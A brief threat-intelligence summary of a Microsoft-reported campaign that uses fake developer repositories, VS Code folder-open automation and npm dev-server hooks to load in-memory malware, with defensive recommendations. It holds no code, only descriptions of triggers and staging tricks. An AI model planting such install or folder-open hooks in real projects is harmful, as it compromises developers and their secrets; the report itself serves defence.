Overview
- Microsoft detailed a coordinated campaign using professional‑looking Next.js and job‑assessment repositories on GitHub and Bitbucket, with a limited set directly tied to observed compromises.
- Malicious logic triggers during normal activity via VS Code workspace automation on folder open, dev server runs through npm run dev, or backend startup, fetching loaders often hosted on Vercel for in‑memory execution.
- Compromised hosts register with attacker C2, then upgrade to a second‑stage controller that runs tasks entirely in memory, rotates identifiers, tracks spawned processes, supports file discovery and exfiltration, and can obey kill‑switches.
- Researchers reported evolving staging tactics that include GitHub gists and URL shorteners, a malicious npm package named eslint‑validator pulling an obfuscated payload from Google Drive, and a Windows‑only chain that downloads Node.js and uses certutil to execute Python malware; another variant retrieves JavaScript from an NFT contract on the Polygon blockchain.
- Microsoft urged enforcing VS Code Workspace Trust or Restricted Mode, applying Attack Surface Reduction rules, minimizing secrets on developer endpoints with short‑lived tokens, containerizing untrusted code, and monitoring unusual Node execution and outbound connections, while public attribution remains unconfirmed despite vendor reporting that links related activity to prior Contagious Interview operations and GitLab’s ban of 131 accounts.